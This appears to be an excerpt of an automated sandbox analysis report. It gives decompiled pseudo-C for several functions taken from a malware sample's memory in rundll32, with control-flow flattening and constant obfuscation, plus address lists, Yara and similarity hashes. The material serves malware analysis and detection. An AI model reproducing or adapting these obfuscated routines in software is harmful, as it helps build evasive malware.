                                                                      			E020093AA(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a32) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t248;
				void* _t268;
				signed int _t277;
				signed int _t278;
				signed int _t279;
				signed int _t280;
				void* _t283;
				void* _t306;
				intOrPtr _t307;
				signed int* _t310;

				_push(_a32);
				_t306 = __edx;
				_push(0);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t248 = E02002550(0);
				_v72 = _t248;
				_t307 = _t248;
				_v148 = 0x29e1;
				_t310 =  &(( &_v176)[0xa]);
				_v148 = _v148 >> 9;
				_t283 = 0x2cc51d90;
				_v148 = _v148 * 0x6f;
				_v148 = _v148 | 0x583ef178;
				_v148 = _v148 ^ 0x583efdfc;
				_v164 = 0x7cea;
				_v164 = _v164 | 0x4429ef4c;
				_v164 = _v164 + 0xf89e;
				_v164 = _v164 + 0xffff234a;
				_v164 = _v164 ^ 0x442a1bf6;
				_v92 = 0x551c;
				_v92 = _v92 | 0xd302566e;
				_v92 = _v92 ^ 0xd3022a7a;
				_v144 = 0x6ba7;
				_v144 = _v144 << 4;
				_v144 = _v144 + 0xffffb9a2;
				_v144 = _v144 + 0x5888;
				_v144 = _v144 ^ 0x0006e6af;
				_v112 = 0x922a;
				_v112 = _v112 + 0xffff887d;
				_v112 = _v112 | 0x4fd748bd;
				_v112 = _v112 ^ 0x4fd73150;
				_v96 = 0xfb64;
				_v96 = _v96 ^ 0x5db48c82;
				_v96 = _v96 ^ 0x5db438bb;
				_v80 = 0xb20f;
				_v80 = _v80 >> 2;
				_v80 = _v80 ^ 0x0000552e;
				_v172 = 0x50a7;
				_v172 = _v172 + 0xf2d5;
				_v172 = _v172 + 0x271f;
				_v172 = _v172 << 2;
				_v172 = _v172 ^ 0x0005de3e;
				_v100 = 0xadaf;
				_v100 = _v100 * 0x16;
				_v100 = _v100 ^ 0x000ed173;
				_v116 = 0xf129;
				_v116 = _v116 << 0x10;
				_v116 = _v116 * 0x16;
				_v116 = _v116 ^ 0xb986550c;
				_v104 = 0x5183;
				_v104 = _v104 << 0x10;
				_v104 = _v104 + 0xffff5d8d;
				_v104 = _v104 ^ 0x51824a7c;
				_v88 = 0x760e;
				_v88 = _v88 + 0x327e;
				_v88 = _v88 ^ 0x000099bb;
				_v108 = 0xe303;
				_v108 = _v108 | 0x0bc04f3b;
				_v108 = _v108 ^ 0xb2f83cb4;
				_v108 = _v108 ^ 0xb938c20e;
				_v168 = 0xcb46;
				_v168 = _v168 | 0x1c191218;
				_v168 = _v168 ^ 0xd77ae4dd;
				_v168 = _v168 * 3;
				_v168 = _v168 ^ 0x6229d687;
				_v128 = 0x9759;
				_v128 = _v128 + 0x8621;
				_t277 = 0xf;
				_v128 = _v128 / _t277;
				_v128 = _v128 ^ 0x00007121;
				_v76 = 0xd82;
				_t278 = 0x2a;
				_v76 = _v76 * 0xe;
				_v76 = _v76 ^ 0x0000cd5d;
				_v132 = 0x21c9;
				_v132 = _v132 * 0x5a;
				_v132 = _v132 ^ 0x66c8732e;
				_v132 = _v132 ^ 0x66c3ddac;
				_v176 = 0x796f;
				_v176 = _v176 << 9;
				_v176 = _v176 + 0x7729;
				_v176 = _v176 ^ 0xc241325b;
				_v176 = _v176 ^ 0xc2b2798d;
				_v140 = 0xd764;
				_v140 = _v140 >> 0xa;
				_v140 = _v140 | 0x53b98b23;
				_v140 = _v140 ^ 0x53b9a9a1;
				_v156 = 0xc431;
				_v156 = _v156 * 0x4f;
				_v156 = _v156 / _t278;
				_t279 = 0x11;
				_v156 = _v156 * 0x67;
				_v156 = _v156 ^ 0x00942fb3;
				_v124 = 0x3cc2;
				_v124 = _v124 * 9;
				_v124 = _v124 ^ 0x606055d7;
				_v124 = _v124 ^ 0x60627716;
				_v120 = 0xfe38;
				_v120 = _v120 ^ 0x435657c1;
				_v120 = _v120 + 0x12e6;
				_v120 = _v120 ^ 0x4356a6ba;
				_v152 = 0x32f6;
				_v152 = _v152 | 0x1093d085;
				_v152 = _v152 / _t279;
				_v152 = _v152 << 4;
				_v152 = _v152 ^ 0x0f9a6d0a;
				_v160 = 0x4b19;
				_t280 = 0x77;
				_v160 = _v160 / _t280;
				_v160 = _v160 ^ 0xf7099762;
				_v160 = _v160 | 0x01d0dbaa;
				_v160 = _v160 ^ 0xf7d9b5b4;
				_v84 = 0x47d5;
				_v84 = _v84 << 5;
				_v84 = _v84 ^ 0x0008a7be;
				_v136 = 0xe6c7;
				_v136 = _v136 >> 3;
				_v136 = _v136 | 0xf3ae5db4;
				_v136 = _v136 ^ 0xf3ae7fe8;
				do {
					while(_t283 != 0x1257245d) {
						if(_t283 == 0x1752ae50) {
							_push(_t283);
							_t268 = E0200BB38(_a8, _v92, _v144, _v112, _v96,  &_v72);
							_t310 =  &(_t310[5]);
							__eflags = _t268;
							if(_t268 != 0) {
								_t283 = 0x2f6ec6e3;
								continue;
							}
						} else {
							if(_t283 == 0x2cc51d90) {
								_t283 = 0x1752ae50;
								continue;
							} else {
								_t317 = _t283 - 0x2f6ec6e3;
								if(_t283 != 0x2f6ec6e3) {
									goto L10;
								} else {
									E01FF5755(_v80,  &_v68, _v172, _v100, 0x44);
									_v68 = 0x44;
									_v60 = E01FF5DFC(_v116, _v104, _t317);
									_t307 = E02000566(_a32, _t306, _a8, _v168, _v128, 0, _v76, _v72, _v132, _v176, _v164 | _v148, _v140, _v156,  &_v68, _v124, _v88, _v108, 0x1ff13b0);
									E02000D6D(_v120, _v152, _v160, _v60);
									_t310 =  &(_t310[5]) - 0xc + 0x4c;
									_t283 = 0x1257245d;
									continue;
								}
							}
						}
						goto L11;
					}
					E0200506F(_v84, _v136, _v72);
					_t283 = 0x5a97d8c;
					L10:
					__eflags = _t283 - 0x5a97d8c;
				} while (_t283 != 0x5a97d8c);
				L11:
				return _t307;
			}










































                                                                      0x020093b4
                                                                      0x020093bd
                                                                      0x020093bf
                                                                      0x020093c0
                                                                      0x020093c7
                                                                      0x020093ce
                                                                      0x020093d5
                                                                      0x020093dc
                                                                      0x020093e3
                                                                      0x020093e4
                                                                      0x020093e5
                                                                      0x020093e6
                                                                      0x020093eb
                                                                      0x020093f2
                                                                      0x020093f4
                                                                      0x020093fc
                                                                      0x020093ff
                                                                      0x02009404
                                                                      0x0200940e
                                                                      0x02009412
                                                                      0x0200941a
                                                                      0x02009422
                                                                      0x0200942a
                                                                      0x02009432
                                                                      0x0200943a
                                                                      0x02009442
                                                                      0x0200944a
                                                                      0x02009452
                                                                      0x0200945a
                                                                      0x02009462
                                                                      0x0200946a
                                                                      0x0200946f
                                                                      0x02009477
                                                                      0x0200947f
                                                                      0x02009487
                                                                      0x0200948f
                                                                      0x02009497
                                                                      0x0200949f
                                                                      0x020094a7
                                                                      0x020094af
                                                                      0x020094b7
                                                                      0x020094bf
                                                                      0x020094c7
                                                                      0x020094cc
                                                                      0x020094d4
                                                                      0x020094dc
                                                                      0x020094e4
                                                                      0x020094ec
                                                                      0x020094f1
                                                                      0x020094f9
                                                                      0x02009506
                                                                      0x0200950a
                                                                      0x02009512
                                                                      0x0200951a
                                                                      0x02009524
                                                                      0x02009528
                                                                      0x02009530
                                                                      0x02009538
                                                                      0x0200953d
                                                                      0x02009545
                                                                      0x0200954d
                                                                      0x02009555
                                                                      0x0200955d
                                                                      0x02009565
                                                                      0x0200956d
                                                                      0x02009575
                                                                      0x0200957d
                                                                      0x02009585
                                                                      0x0200958d
                                                                      0x02009595
                                                                      0x020095a2
                                                                      0x020095a6
                                                                      0x020095ae
                                                                      0x020095b8
                                                                      0x020095cb
                                                                      0x020095d0
                                                                      0x020095d6
                                                                      0x020095de
                                                                      0x020095eb
                                                                      0x020095ee
                                                                      0x020095f2
                                                                      0x020095fa
                                                                      0x02009607
                                                                      0x0200960b
                                                                      0x02009613
                                                                      0x0200961b
                                                                      0x02009623
                                                                      0x02009628
                                                                      0x02009630
                                                                      0x02009638
                                                                      0x02009640
                                                                      0x02009648
                                                                      0x0200964d
                                                                      0x02009655
                                                                      0x0200965d
                                                                      0x0200966a
                                                                      0x02009676
                                                                      0x0200967f
                                                                      0x02009682
                                                                      0x02009686
                                                                      0x0200968e
                                                                      0x0200969b
                                                                      0x0200969f
                                                                      0x020096a7
                                                                      0x020096af
                                                                      0x020096b7
                                                                      0x020096bf
                                                                      0x020096c7
                                                                      0x020096cf
                                                                      0x020096d7
                                                                      0x020096e7
                                                                      0x020096eb
                                                                      0x020096f0
                                                                      0x020096f8
                                                                      0x02009704
                                                                      0x0200970c
                                                                      0x02009710
                                                                      0x02009718
                                                                      0x02009720
                                                                      0x02009728
                                                                      0x02009730
                                                                      0x02009735
                                                                      0x0200973d
                                                                      0x02009745
                                                                      0x0200974a
                                                                      0x02009752
                                                                      0x0200975a
                                                                      0x0200975a
                                                                      0x02009768
                                                                      0x02009851
                                                                      0x0200986e
                                                                      0x02009873
                                                                      0x02009876
                                                                      0x02009878
                                                                      0x0200987a
                                                                      0x00000000
                                                                      0x0200987a
                                                                      0x0200976e
                                                                      0x02009774
                                                                      0x0200984a
                                                                      0x00000000
                                                                      0x0200977a
                                                                      0x0200977a
                                                                      0x0200977c
                                                                      0x00000000
                                                                      0x02009782
                                                                      0x02009797
                                                                      0x020097a5
                                                                      0x020097c4
                                                                      0x02009827
                                                                      0x02009838
                                                                      0x0200983d
                                                                      0x02009840
                                                                      0x00000000
                                                                      0x02009840
                                                                      0x0200977c
                                                                      0x02009774
                                                                      0x00000000
                                                                      0x02009768
                                                                      0x0200988d
                                                                      0x02009893
                                                                      0x02009898
                                                                      0x02009898
                                                                      0x02009898
                                                                      0x020098a5
                                                                      0x020098b0

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !q$)w$.U$D$L)D$~2$)
                                                                      • API String ID: 0-595699237
                                                                      • Opcode ID: 511870ddf36565991de80c0fc29378eccdbe5134a7f8a86759dc73472c26fcd7
                                                                      • Instruction ID: 4c23e10e6bd76d8c013de504288cc458172c18ca5d54c6ba5fd7ece8a55dd4cb
                                                                      • Opcode Fuzzy Hash: 511870ddf36565991de80c0fc29378eccdbe5134a7f8a86759dc73472c26fcd7
                                                                      • Instruction Fuzzy Hash: B6C1F0715083809FE369CF65D48961FFBE2BBC5748F10891DF19A962A0D3B68A49CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0024891E, Relevance: 9.0, Strings: 7, Instructions: 242COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: !q$)w$.U$D$L)D$~2$)
                                                                      • API String ID: 0-595699237
                                                                      • Opcode ID: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
                                                                      • Instruction ID: 1635e3d5262046a140a1c05afb35ce1a349f747b3394c0ee092cea8b56dc1b34
                                                                      • Opcode Fuzzy Hash: 7256cd9149fbbca799cb3615b561e9a7d920d3c9d6f0bc85317b2e9bdd81c148
                                                                      • Instruction Fuzzy Hash: C9C10F715183809FE368CF65C58A61FFBE1BBC4348F10891DF2A6962A0D7B58A59CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01FF5F04, Relevance: 9.0, Strings: 7, Instructions: 237COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 93%
                                                                      			E01FF5F04() {
				char _v524;
				intOrPtr _v548;
				char _v564;
				void* _v576;
				intOrPtr _v580;
				signed int _v584;
				char _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _t227;
				void* _t230;
				signed int _t231;
				void* _t233;
				signed int _t238;
				void* _t239;
				signed int _t241;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t246;
				signed int _t261;
				void* _t265;
				void* _t267;
				signed int* _t272;

				_t272 =  &_v676;
				_v580 = 0x338be2;
				asm("stosd");
				_t239 = 0;
				_t241 = 0x39;
				asm("stosd");
				_t265 = 0x41161d4;
				asm("stosd");
				_v620 = 0xc71e;
				_v620 = _v620 * 0x1e;
				_v620 = _v620 >> 5;
				_v620 = _v620 ^ 0x0000ba2c;
				_v648 = 0x4ad;
				_v648 = _v648 / _t241;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 >> 0xe;
				_v648 = _v648 ^ 0x00000001;
				_v660 = 0xb98c;
				_v660 = _v660 | 0xef7bff5f;
				_v660 = _v660 ^ 0xef7ba8e4;
				_v632 = 0x5e63;
				_v632 = _v632 | 0xe7359418;
				_v632 = _v632 + 0x2517;
				_v632 = _v632 ^ 0xe7367cd6;
				_v596 = 0x2929;
				_v596 = _v596 + 0x43ca;
				_v596 = _v596 ^ 0x000063d5;
				_v664 = 0x7cfb;
				_v664 = _v664 ^ 0xff809b0f;
				_v664 = _v664 + 0x2cd1;
				_v664 = _v664 + 0x7a24;
				_v664 = _v664 ^ 0xff81c2ff;
				_v592 = 0xae03;
				_t242 = 9;
				_v592 = _v592 / _t242;
				_v592 = _v592 ^ 0x0000766d;
				_v608 = 0x3b9d;
				_v608 = _v608 | 0x6b9c2f64;
				_v608 = _v608 ^ 0x6b9c4a2d;
				_v656 = 0xaf4c;
				_v656 = _v656 << 2;
				_v656 = _v656 + 0xc291;
				_v656 = _v656 + 0x928e;
				_v656 = _v656 ^ 0x0004749a;
				_v604 = 0xbdeb;
				_v604 = _v604 | 0xec45ef56;
				_v604 = _v604 ^ 0xec45acc1;
				_v644 = 0x8038;
				_v644 = _v644 ^ 0x1255fbe8;
				_t243 = 0x4b;
				_v644 = _v644 / _t243;
				_v644 = _v644 * 0x17;
				_v644 = _v644 ^ 0x059f4be8;
				_v652 = 0x8226;
				_v652 = _v652 << 1;
				_v652 = _v652 + 0xffffb0cc;
				_v652 = _v652 + 0xffff366a;
				_v652 = _v652 ^ 0xffff9d86;
				_v640 = 0x94c8;
				_v640 = _v640 >> 3;
				_v640 = _v640 | 0xd3d89bc1;
				_v640 = _v640 ^ 0xd3d8bf09;
				_v600 = 0x2497;
				_v600 = _v600 >> 5;
				_v600 = _v600 ^ 0x00002681;
				_v616 = 0xf8c0;
				_v616 = _v616 + 0xffffe75c;
				_v616 = _v616 >> 5;
				_v616 = _v616 ^ 0x00007175;
				_v624 = 0x8160;
				_t244 = 0x37;
				_v624 = _v624 / _t244;
				_v624 = _v624 + 0xffff3ee5;
				_v624 = _v624 ^ 0xffff1b58;
				_v636 = 0xef93;
				_v636 = _v636 | 0x0110f965;
				_t245 = 0x18;
				_v636 = _v636 * 0x45;
				_v636 = _v636 ^ 0x4994db44;
				_v612 = 0xb7f9;
				_v612 = _v612 | 0xd5831ca8;
				_v612 = _v612 ^ 0xd583ba2a;
				_v668 = 0xb9bd;
				_v668 = _v668 >> 0xb;
				_v668 = _v668 + 0xf462;
				_v668 = _v668 + 0xb834;
				_v668 = _v668 ^ 0x0001a073;
				_v676 = 0xaaae;
				_t264 = _v612;
				_v676 = _v676 / _t245;
				_t227 = _v676;
				_t246 = 0x6e;
				_t261 = _t227 % _t246;
				_v676 = _t227 / _t246;
				_v676 = _v676 + 0xffff2536;
				_v676 = _v676 ^ 0xffff3866;
				_v628 = 0x8f9e;
				_v628 = _v628 * 3;
				_v628 = _v628 >> 5;
				_v628 = _v628 ^ 0x00000ef3;
				_v672 = 0x182c;
				_v672 = _v672 + 0xffff84fe;
				_v672 = _v672 + 0xd7a3;
				_v672 = _v672 | 0x6c762e0a;
				_v672 = _v672 ^ 0x6c767ecc;
				do {
					while(_t265 != 0x5e31a3) {
						if(_t265 == 0x41161d4) {
							_t265 = 0xacc4a3c;
							continue;
						} else {
							if(_t265 == 0x7641b8a) {
								_t231 = E02007A31(_v644,  &_v564, _t246, _v652, _t264, _v640, _t246, _v600);
								asm("sbb esi, esi");
								_t261 = _v624;
								_t246 = _v616;
								_t265 = ( ~_t231 & 0x1bdf7361) + 0x8e8e3cb;
								E01FFF1ED(_t246, _t261, _v636, _v612, _t264);
								_t272 =  &(_t272[9]);
								goto L19;
							} else {
								if(_t265 == 0xacc4a3c) {
									_push(_t246);
									_t261 =  &_v524;
									_t246 = _v660;
									_t233 = E01FFDFD8(_t246, _t261, __eflags, _v632, _v596);
									_t272 =  &(_t272[3]);
									__eflags = _t233;
									if(__eflags != 0) {
										_t265 = 0x2aa4bbbd;
										continue;
									}
								} else {
									if(_t265 == 0x24c8572c) {
										_t261 = _v676;
										E02004291(_v668, _t261,  &_v588, _v628);
										_pop(_t246);
										_t265 = 0x5e31a3;
										continue;
									} else {
										if(_t265 != 0x2aa4bbbd) {
											goto L19;
										} else {
											_push(_t246);
											_t261 = _v620;
											_t246 = _v648;
											_t238 = E0200C0C8(_t246, _t261, _v664,  &_v524, _v592, _v608, 0, _v656, _t246, _v672, _v604);
											_t264 = _t238;
											_t272 =  &(_t272[0xa]);
											if(_t238 != 0xffffffff) {
												_t265 = 0x7641b8a;
												continue;
											}
										}
									}
								}
							}
						}
						goto L20;
					}
					_t230 = E01FF47EB();
					_t267 = _v588 - _v548;
					_t246 = _v584;
					asm("sbb ecx, [esp+0x94]");
					__eflags = _t246 - _t261;
					if(__eflags >= 0) {
						if(__eflags > 0) {
							L17:
							_t239 = 1;
							__eflags = 1;
						} else {
							__eflags = _t267 - _t230;
							if(_t267 >= _t230) {
								goto L17;
							}
						}
					}
					_t265 = 0x8e8e3cb;
					L19:
					__eflags = _t265 - 0x8e8e3cb;
				} while (__eflags != 0);
				L20:
				return _t239;
			}
















































                                                                      0x01ff5f04
                                                                      0x01ff5f0a
                                                                      0x01ff5f1e
                                                                      0x01ff5f1f
                                                                      0x01ff5f23
                                                                      0x01ff5f26
                                                                      0x01ff5f27
                                                                      0x01ff5f2c
                                                                      0x01ff5f2d
                                                                      0x01ff5f3a
                                                                      0x01ff5f3e
                                                                      0x01ff5f43
                                                                      0x01ff5f4b
                                                                      0x01ff5f5b
                                                                      0x01ff5f5f
                                                                      0x01ff5f64
                                                                      0x01ff5f69
                                                                      0x01ff5f6e
                                                                      0x01ff5f76
                                                                      0x01ff5f7e
                                                                      0x01ff5f86
                                                                      0x01ff5f8e
                                                                      0x01ff5f96
                                                                      0x01ff5f9e
                                                                      0x01ff5fa6
                                                                      0x01ff5fae
                                                                      0x01ff5fb6
                                                                      0x01ff5fbe
                                                                      0x01ff5fc6
                                                                      0x01ff5fce
                                                                      0x01ff5fd6
                                                                      0x01ff5fde
                                                                      0x01ff5fe6
                                                                      0x01ff5ff2
                                                                      0x01ff5ff7
                                                                      0x01ff5ffd
                                                                      0x01ff6005
                                                                      0x01ff600d
                                                                      0x01ff6015
                                                                      0x01ff601d
                                                                      0x01ff6025
                                                                      0x01ff602a
                                                                      0x01ff6032
                                                                      0x01ff603a
                                                                      0x01ff6042
                                                                      0x01ff604a
                                                                      0x01ff6052
                                                                      0x01ff605a
                                                                      0x01ff6062
                                                                      0x01ff606e
                                                                      0x01ff6071
                                                                      0x01ff607a
                                                                      0x01ff607e
                                                                      0x01ff6086
                                                                      0x01ff608e
                                                                      0x01ff6092
                                                                      0x01ff609a
                                                                      0x01ff60a2
                                                                      0x01ff60aa
                                                                      0x01ff60b2
                                                                      0x01ff60b7
                                                                      0x01ff60bf
                                                                      0x01ff60c7
                                                                      0x01ff60d1
                                                                      0x01ff60db
                                                                      0x01ff60e3
                                                                      0x01ff60eb
                                                                      0x01ff60f3
                                                                      0x01ff60f8
                                                                      0x01ff6100
                                                                      0x01ff610e
                                                                      0x01ff6113
                                                                      0x01ff6119
                                                                      0x01ff6121
                                                                      0x01ff6129
                                                                      0x01ff6131
                                                                      0x01ff613e
                                                                      0x01ff6141
                                                                      0x01ff6145
                                                                      0x01ff614d
                                                                      0x01ff6155
                                                                      0x01ff615d
                                                                      0x01ff6165
                                                                      0x01ff616d
                                                                      0x01ff6172
                                                                      0x01ff617a
                                                                      0x01ff6182
                                                                      0x01ff618a
                                                                      0x01ff619a
                                                                      0x01ff619e
                                                                      0x01ff61a2
                                                                      0x01ff61a6
                                                                      0x01ff61a7
                                                                      0x01ff61a9
                                                                      0x01ff61ad
                                                                      0x01ff61b5
                                                                      0x01ff61bd
                                                                      0x01ff61ca
                                                                      0x01ff61ce
                                                                      0x01ff61d3
                                                                      0x01ff61db
                                                                      0x01ff61e3
                                                                      0x01ff61eb
                                                                      0x01ff61f3
                                                                      0x01ff61fb
                                                                      0x01ff6203
                                                                      0x01ff6203
                                                                      0x01ff6215
                                                                      0x01ff632b
                                                                      0x00000000
                                                                      0x01ff621b
                                                                      0x01ff6221
                                                                      0x01ff62fd
                                                                      0x01ff630b
                                                                      0x01ff6311
                                                                      0x01ff631b
                                                                      0x01ff631f
                                                                      0x01ff6321
                                                                      0x01ff6326
                                                                      0x00000000
                                                                      0x01ff6227
                                                                      0x01ff622d
                                                                      0x01ff62b5
                                                                      0x01ff62ba
                                                                      0x01ff62c5
                                                                      0x01ff62c9
                                                                      0x01ff62ce
                                                                      0x01ff62d1
                                                                      0x01ff62d3
                                                                      0x01ff62d9
                                                                      0x00000000
                                                                      0x01ff62d9
                                                                      0x01ff6233
                                                                      0x01ff6239
                                                                      0x01ff6297
                                                                      0x01ff62a4
                                                                      0x01ff62aa
                                                                      0x01ff62ab
                                                                      0x00000000
                                                                      0x01ff623b
                                                                      0x01ff6241
                                                                      0x00000000
                                                                      0x01ff6247
                                                                      0x01ff6247
                                                                      0x01ff626e
                                                                      0x01ff6272
                                                                      0x01ff6276
                                                                      0x01ff627b
                                                                      0x01ff627d
                                                                      0x01ff6283
                                                                      0x01ff6289
                                                                      0x00000000
                                                                      0x01ff6289
                                                                      0x01ff6283
                                                                      0x01ff6241
                                                                      0x01ff6239
                                                                      0x01ff622d
                                                                      0x01ff6221
                                                                      0x00000000
                                                                      0x01ff6215
                                                                      0x01ff6335
                                                                      0x01ff633e
                                                                      0x01ff6345
                                                                      0x01ff6349
                                                                      0x01ff6350
                                                                      0x01ff6352
                                                                      0x01ff6354
                                                                      0x01ff635a
                                                                      0x01ff635c
                                                                      0x01ff635c
                                                                      0x01ff6356
                                                                      0x01ff6356
                                                                      0x01ff6358
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01ff6358
                                                                      0x01ff6354
                                                                      0x01ff635d
                                                                      0x01ff635f
                                                                      0x01ff635f
                                                                      0x01ff635f
                                                                      0x01ff636a
                                                                      0x01ff6373

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .vl$$z$))$VE$c^$mv$uq
                                                                      • API String ID: 0-129554973
                                                                      • Opcode ID: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
                                                                      • Instruction ID: f8b64368b852ac9f41bad786ed06e6aa79dbf5b38d683d589ae2344ce488264f
                                                                      • Opcode Fuzzy Hash: ee9812c7270f18a38839004d5a8fb2575288c372572a24ef6638758e56e56959
                                                                      • Instruction Fuzzy Hash: 00B114729083419FE368CF29C58990BBBF1BBC5718F404A1CF6D5962A0D7BA9909CF47
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00235478, Relevance: 9.0, Strings: 7, Instructions: 237COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: .vl$$z$))$VE$c^$mv$uq
                                                                      • API String ID: 0-129554973
                                                                      • Opcode ID: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
                                                                      • Instruction ID: 20a6aee2906adecbc4e23cb7d8f30c261731879da4a26c8a49a3a06ea62d8ef2
                                                                      • Opcode Fuzzy Hash: df02dcf10120f5ed3c1aa02081fe2585210939953c6582f116513764aba39f46
                                                                      • Instruction Fuzzy Hash: 4FB131B29183819FE368CE25C48991BFBF1BBC5718F004A1CF5D9962A0D3B98959CF43
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0200434E, Relevance: 8.9, Strings: 7, Instructions: 199COMMONCrypto
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 100%
                                                                      			E0200434E() {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _t172;
				signed int _t176;
				void* _t179;
				void* _t200;
				intOrPtr _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int _t211;
				signed int _t212;
				intOrPtr* _t214;
				signed int* _t216;

				_t216 =  &_v80;
				_v16 = 0x14d035;
				_v12 = 0x6b8268;
				_t179 = 0xb19f7ca;
				_t206 = 0;
				_v8 = 0;
				_v4 = 0;
				_v32 = 0x3622;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x000106c4;
				_v40 = 0x4e9a;
				_v40 = _v40 >> 0xc;
				_v40 = _v40 ^ 0x000001e1;
				_v80 = 0xc10;
				_v80 = _v80 >> 9;
				_t207 = 0x7c;
				_v80 = _v80 / _t207;
				_v80 = _v80 >> 0xf;
				_v80 = _v80 ^ 0x0000249f;
				_v64 = 0x9f18;
				_v64 = _v64 >> 0xb;
				_v64 = _v64 + 0xffff1ff5;
				_v64 = _v64 | 0x0b80b4b6;
				_v64 = _v64 ^ 0xffff9b0d;
				_v36 = 0x945d;
				_v36 = _v36 + 0xffff610d;
				_v36 = _v36 ^ 0xffffd8f7;
				_v48 = 0x2aad;
				_t208 = 0x7f;
				_v48 = _v48 / _t208;
				_v48 = _v48 ^ 0x00003e6e;
				_v56 = 0xddc4;
				_t209 = 0x5e;
				_v56 = _v56 * 0x14;
				_v56 = _v56 + 0xffff71f7;
				_v56 = _v56 ^ 0x001091c0;
				_v68 = 0xa802;
				_v68 = _v68 ^ 0x67e8667b;
				_v68 = _v68 >> 0xc;
				_v68 = _v68 * 0x47;
				_v68 = _v68 ^ 0x01cd2f8d;
				_v52 = 0xc142;
				_v52 = _v52 * 0x44;
				_v52 = _v52 ^ 0x822744f1;
				_v52 = _v52 ^ 0x82146dfa;
				_v72 = 0xbd15;
				_v72 = _v72 / _t209;
				_v72 = _v72 ^ 0x12aa425e;
				_v72 = _v72 | 0x2ffcb14d;
				_v72 = _v72 ^ 0x3ffeb451;
				_v76 = 0x6e7b;
				_v76 = _v76 >> 0xb;
				_v76 = _v76 >> 3;
				_v76 = _v76 / _t209;
				_v76 = _v76 ^ 0x00006fef;
				_v20 = 0x31f;
				_v20 = _v20 | 0xb0d9e19e;
				_v20 = _v20 ^ 0xb0d9bf73;
				_v60 = 0x7aa7;
				_t178 = _v20;
				_t210 = 0x41;
				_v60 = _v60 / _t210;
				_t211 = 0x59;
				_t215 = _v20;
				_v60 = _v60 * 0x36;
				_t212 = _v20;
				_v60 = _v60 / _t211;
				_v60 = _v60 ^ 0x0000613c;
				_v24 = 0x73cc;
				_v24 = _v24 >> 0xc;
				_v24 = _v24 ^ 0x00003ffa;
				_v28 = 0xa6c1;
				_v28 = _v28 >> 3;
				_v28 = _v28 ^ 0x0000757c;
				_v44 = 0x6c53;
